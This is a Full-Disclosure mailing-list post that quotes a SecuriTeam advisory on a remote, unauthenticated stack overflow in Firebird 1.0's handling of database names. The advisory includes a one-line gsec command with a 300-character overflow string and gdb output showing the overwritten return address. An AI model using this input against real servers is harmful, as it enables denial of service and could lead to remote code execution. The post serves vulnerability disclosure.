[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <3CF95025.7090202@secnetops.com>
From: kf_lists at secnetops.com (KF (lists))
Subject: Firebird Database Remote Database Name Overflow
So is this firebird specific or does it also impact Borland Interbase
users?
-KF
Aviram Jenik wrote:
> Firebird Database Remote Database Name Overflow
>------------------------------------------------------------------------
>
>Article reference:
>http://www.securiteam.com/unixfocus/5AP0P0UCUO.html
>
>
>SUMMARY
>
><http://firebird.sourceforge.net> Firebird is "a relational database offering
>many ANSI SQL-92 features that runs on Linux, Windows, and a variety of Unix
>platforms. Firebird offers excellent concurrency, high performance, and
>powerful language support for stored procedures and triggers. It has been
>used in production systems, under a variety of names since 1981".
>
>A vulnerability in Firebird Database's way of handling database names, allows
>an unauthenticated user to cause the server to crash, and overwrite critical
>section of the stack used by the database.
>
>DETAILS
>
>Vulnerable Systems:
>* Firebird Database version 1.0 (1.0.2-2.1) - Debian unstable
>
>Immune Systems:
>* Firebird Database version 1.5.0 (others are presumed to be immuned as well)
>
>
>By issuing:
>gsec -database 192.168.1.52:`perl -e'print ("A"x300)'` -user whenever
>-password whatever
>
>On a remote server, you can see that:
>gdb /usr/lib/firebird/bin/ibserver
>GNU gdb 6.1-debian Copyright 2004 Free Software Foundation, Inc. GDB is
>free software, covered by the GNU General Public
>License, and you are welcome to change it and/or distribute copies of it
>under certain conditions.
>Type "show copying" to see the conditions.
>There is absolutely no warranty for GDB. Type "show warranty" for
>details.
>This GDB was configured as "i386-linux"...(no debugging symbols
>found)...Using host libthread_db library
>"/lib/tls/libthread_db.so.1".
>
>(gdb) r
>Starting program: /usr/lib/firebird/bin/ibserver
>(no debugging symbols found)...(no debugging symbols
>found)...(no debugging symbols found)...(no debugging
>symbols found)...(no debugging symbols found)...[Thread
>debugging using libthread_db enabled]
>[New Thread 1075462272 (LWP 31389)]
>(no debugging symbols found)...(no debugging symbols
>found)...(no debugging symbols found)...(no debugging
>symbols found)...(no debugging symbols found)...[New
>Thread 1092549552 (LWP 31392)]
>[New Thread 1100938160 (LWP 31393)]
>[Thread 1100938160 (LWP 31393) exited]
>[Thread 1092549552 (LWP 31392) exited]
>[New Thread 1092549552 (LWP 31396)]
>
>Program received signal SIGSEGV, Segmentation fault.
>[Switching to Thread 1092549552 (LWP 31396)]
>0x08132223 in ERR_post ()
>
>
>(gdb) bt
>#0 0x08132223 in ERR_post ()
>#1 0x080942ac in THD_wlck_unlock ()
>#2 0x41414141 in ?? ()
>#3 0x41414141 in ?? ()
>#4 0x41414141 in ?? ()
>#5 0x41414141 in ?? ()
>#6 0x41414141 in ?? ()
>#7 0x41414141 in ?? ()
>#8 0x00414141 in ?? ()
>#9 0x0000012c in ?? ()
>..
>
>Solution:
>Debian is currently not maintaining this version of the product, so it is
>recommended that you use a source code based installation.
>
>
>ADDITIONAL INFORMATION
>
>The information has been provided by <mailto:expert@...uriteam.com> Noam
>Rathaus.
>
>
>Regards,
>Aviram Jenik
>Beyond Security Ltd.
>
>http://www.BeyondSecurity.com
>http://www.SecuriTeam.com
>
>The First Integrated Network and Web Application Vulnerability Scanner:
>http://www.beyondsecurity.com/webscan-wp.pdf
>
>
>
>
>====================
>====================
>
>DISCLAIMER:
>The information in this bulletin is provided "AS IS" without warranty of any
>kind.
>In no event shall we be liable for any damages whatsoever including direct,
>indirect, incidental, consequential, loss of business profits or special
>damages.
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
>
Powered by blists - more mailing lists